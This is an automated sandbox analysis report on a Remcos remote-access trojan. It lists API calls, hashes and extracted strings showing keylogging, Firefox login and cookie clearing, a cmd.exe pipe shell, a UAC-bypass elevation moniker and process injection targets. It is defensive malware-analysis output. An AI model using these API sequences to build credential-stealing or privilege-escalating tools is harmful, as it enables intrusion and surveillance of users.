                                      • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                      • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                      • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc__crt_fast_encode_pointer
                                      • String ID:
                                      • API String ID: 2279764990-0
                                      • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                      • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                      • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                      • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                      • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                      • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                      • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                      • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                      • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                      • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                      • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                      • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                        • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                        • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                        • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                        • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                        • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                        • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                      • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                      • DeleteFileA.KERNEL32(?), ref: 00408652
                                        • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                        • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                        • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                        • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                      • Sleep.KERNEL32(000007D0), ref: 004086F8
                                      • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                        • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                      • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                      • API String ID: 1067849700-181434739
                                      • Opcode ID: 8f1de24e8e2415dac4a89a953b4d4385ab3642e9f2366ded161f37adb31fab15
                                      • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                      • Opcode Fuzzy Hash: 8f1de24e8e2415dac4a89a953b4d4385ab3642e9f2366ded161f37adb31fab15
                                      • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 004056E6
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • __Init_thread_footer.LIBCMT ref: 00405723
                                      • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                      • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                      • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                      • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                      • CloseHandle.KERNEL32 ref: 00405A23
                                      • CloseHandle.KERNEL32 ref: 00405A2B
                                      • CloseHandle.KERNEL32 ref: 00405A3D
                                      • CloseHandle.KERNEL32 ref: 00405A45
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                      • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                      • API String ID: 2994406822-18413064
                                      • Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                                      • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                      • Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                                      • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 00412106
                                        • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                        • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                        • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                      • CloseHandle.KERNEL32(00000000), ref: 00412155
                                      • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                      • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                      • API String ID: 3018269243-13974260
                                      • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                      • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                      • Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                      • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                      • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                      • FindClose.KERNEL32(00000000), ref: 0040BD12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                      • API String ID: 1164774033-3681987949
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenClipboard.USER32 ref: 004168C2
                                      • EmptyClipboard.USER32 ref: 004168D0
                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                      • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                      • CloseClipboard.USER32 ref: 00416955
                                      • OpenClipboard.USER32 ref: 0041695C
                                      • GetClipboardData.USER32(0000000D), ref: 0041696C
                                      • GlobalLock.KERNEL32(00000000), ref: 00416975
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                      • CloseClipboard.USER32 ref: 00416984
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                      • String ID: !D@
                                      • API String ID: 3520204547-604454484
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                      • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                      • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                      • FindClose.KERNEL32(00000000), ref: 0040BED0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$File$FirstNext
                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 3527384056-432212279
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                      • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                      • API String ID: 3756808967-1743721670
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 0$1$2$3$4$5$6$7$VG
                                      • API String ID: 0-1861860590
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _wcslen.LIBCMT ref: 00407521
                                      • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Object_wcslen
                                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                      • API String ID: 240030777-3166923314
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                      • GetLastError.KERNEL32 ref: 0041A7BB
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                      • String ID:
                                      • API String ID: 3587775597-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                      • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                      • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                      • String ID: lJD$lJD$lJD
                                      • API String ID: 745075371-479184356
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                      • FindClose.KERNEL32(00000000), ref: 0040C47D
                                      • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 1164774033-405221262
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                        • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                      • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                      • String ID:
                                      • API String ID: 2341273852-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Find$CreateFirstNext
                                      • String ID: 8SG$PXG$PXG$NG$PG
                                      • API String ID: 341183262-3812160132
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                      • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                      • GetLastError.KERNEL32 ref: 0040A2ED
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                      • TranslateMessage.USER32(?), ref: 0040A34A
                                      • DispatchMessageA.USER32(?), ref: 0040A355
                                      Strings
                                      • Keylogger initialization failure: error , xrefs: 0040A301
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                      • String ID: Keylogger initialization failure: error
                                      • API String ID: 3219506041-952744263
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetForegroundWindow.USER32 ref: 0040A416
                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                      • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                      • GetKeyState.USER32(00000010), ref: 0040A433
                                      • GetKeyboardState.USER32(?), ref: 0040A43E
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                      • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                      • String ID:
                                      • API String ID: 1888522110-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                      • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                      • API String ID: 2127411465-314212984
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00449212
                                      • _free.LIBCMT ref: 00449236
                                      • _free.LIBCMT ref: 004493BD
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                      • _free.LIBCMT ref: 00449589
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                      • String ID:
                                      • API String ID: 314583886-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                        • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                        • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                        • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                        • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                      • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                      • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                      • String ID: !D@$PowrProf.dll$SetSuspendState
                                      • API String ID: 1589313981-2876530381
                                      • Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                      • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                      • Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                      • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                      • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                      • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                      Strings
                                      Memory Dump Source
